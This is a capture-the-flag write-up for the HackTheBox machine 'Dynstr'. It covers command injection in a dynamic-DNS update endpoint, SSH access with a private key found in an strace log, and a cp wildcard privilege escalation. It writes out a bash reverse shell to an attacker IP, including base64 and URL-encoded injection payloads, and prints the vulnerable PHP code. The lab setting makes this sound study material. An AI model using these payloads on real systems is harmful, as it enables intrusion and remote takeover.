DYNSTR

Scanning

NMAP

22/tcp open  ssh
53/tcp open  domain
80/tcp open  http

Enumeration

port 80

we have beta mode

Credentials dynadns:sndanyd

whatweb

➜  ~ sudo whatweb dynstr.htb
http://dynstr.htb [200 OK] Apache[2.4.41], Bootstrap, Country[RESERVED][ZZ], Email[#,dns@dyna.htb], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.10.10.244], JQuery, Modernizr, Script[text/javascript], Title[Dyna DNS]

after some directory busting

i found this http://dynstr.htb/nic/update

after some googling i found this page

lets preform this using BurpSuite ... you may get 911 [wrngdom: htb] so try to change hostname

with these values

Exploit

Test hostname Parameter by adding ; or `

we can use `` in hostname param without break logic

reverse shell bash -i >& /dev/tcp/10.10.16.17/4242 0>&1

base64 encode YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4xNy80MjQyIDA+JjEK to keep logic up

some bash to decode payload on target

`echo 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4xNy80MjQyIDA+JjEK' | base64 -d | bash`

if we try to send like that logic down

so use url encoding

%60%65%63%68%6f%20%27%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%78%4d%43%34%78%4d%43%34%78%4e%69%34%78%4e%79%38%30%4d%6a%51%79%49%44%41%2b%4a%6a%45%4b%27%20%7c%20%62%61%73%65%36%34%20%2d%64%20%7c%20%62%61%73%68%60

add Authorization: Basic ZHluYWRuczpzbmRhbnlk header value = base64(dynadns:sndanyd)

setup listener and Send

Finally in 🎉

Service Shell Access

// Vuln Code
www-data@dynstr:/var/www/html/nic$ cat update
<?php
  // Check authentication
  if (!isset($_SERVER['PHP_AUTH_USER']) || !isset($_SERVER['PHP_AUTH_PW']))      { echo "badauth\n"; exit; }
  if ($_SERVER['PHP_AUTH_USER'].":".$_SERVER['PHP_AUTH_PW']!=='dynadns:sndanyd') { echo "badauth\n"; exit; }

  // Set $myip from GET, defaulting to REMOTE_ADDR
  $myip = $_SERVER['REMOTE_ADDR'];
  if ($valid=filter_var($_GET['myip'],FILTER_VALIDATE_IP))                       { $myip = $valid; }

  if(isset($_GET['hostname'])) {
    // Check for a valid domain
    list($h,$d) = explode(".",$_GET['hostname'],2);
    $validds = array('dnsalias.htb','dynamicdns.htb','no-ip.htb');
    if(!in_array($d,$validds)) { echo "911 [wrngdom: $d]\n"; exit; }
    // Update DNS entry
    $cmd = sprintf("server 127.0.0.1\nzone %s\nupdate delete %s.%s\nupdate add %s.%s 30 IN A %s\nsend\n",$d,$h,$d,$h,$d,$myip);
    system('echo "'.$cmd.'" | /usr/bin/nsupdate -t 1 -k /etc/bind/ddns.key',$retval);
    // Return good or 911
    if (!$retval) {
      echo "good $myip\n";
    } else {
      echo "911 [nsupdate failed]\n"; exit;
    }
  } else {
    echo "nochg $myip\n";
  }
?>

Getting User

there is 2 users bindmgr, dyna

in this directory /home/bindmgr/support-case-C62796521 we fine strace-C62796521.txt

cat strace-C62796521.txt

we find private key

copy it to attacker machine

chmod 600 pri_key

ssh targ not working ....

add ip zone

ssh again it works

USER SHELL ACCESS

Privilege Escalation

cat this script find this

bindmgr@dynstr:~$ cat /usr/local/bin/bindmgr.sh
#!/usr/bin/bash

# This script generates named.conf.bindmgr to workaround the problem
# that bind/named can only include single files but no directories.
#
# It creates a named.conf.bindmgr file in /etc/bind that can be included
# from named.conf.local (or others) and will include all files from the
# directory /etc/bin/named.bindmgr.
#
# NOTE: The script is work in progress. For now bind is not including
#       named.conf.bindmgr. 
#
# TODO: Currently the script is only adding files to the directory but
#       not deleting them. As we generate the list of files to be included
#       from the source directory they won't be included anyway.

BINDMGR_CONF=/etc/bind/named.conf.bindmgr
BINDMGR_DIR=/etc/bind/named.bindmgr

indent() { sed 's/^/    /'; }

# Check versioning (.version)
echo "[+] Running $0 to stage new configuration from $PWD."
if [[ ! -f .version ]] ; then
    echo "[-] ERROR: Check versioning. Exiting."
    exit 42
fi
if [[ "`cat .version 2>/dev/null`" -le "`cat $BINDMGR_DIR/.version 2>/dev/null`" ]] ; then
    echo "[-] ERROR: Check versioning. Exiting."
    exit 43
fi

# Create config file that includes all files from named.bindmgr.
echo "[+] Creating $BINDMGR_CONF file."
printf '// Automatically generated file. Do not modify manually.\n' > $BINDMGR_CONF
for file in * ; do
    printf 'include "/etc/bind/named.bindmgr/%s";\n' "$file" >> $BINDMGR_CONF
done

# Stage new version of configuration files.
echo "[+] Staging files to $BINDMGR_DIR."
cp .version * /etc/bind/named.bindmgr/

# Check generated configuration with named-checkconf.
echo "[+] Checking staged configuration."
named-checkconf $BINDMGR_CONF >/dev/null
if [[ $? -ne 0 ]] ; then
    echo "[-] ERROR: The generated configuration is not valid. Please fix following errors: "
    named-checkconf $BINDMGR_CONF 2>&1 | indent
    exit 44
else 
    echo "[+] Configuration successfully staged."
    # *** TODO *** Uncomment restart once we are live.
    # systemctl restart bind9
    if [[ $? -ne 0 ]] ; then
        echo "[-] Restart of bind9 via systemctl failed. Please check logfile: "
    systemctl status bind9
    else
    echo "[+] Restart of bind9 via systemctl succeeded."
    fi
fi

this part is the key WILDCARD 👏

if this line may looks confuse explain ⬇️
cp [source] [source] [destination]
cp .version * /etc/bind/named.bindmgr/

ROOT SHELL ACCESS

PreviousPREVISE NextPIT

Last updated 4 years ago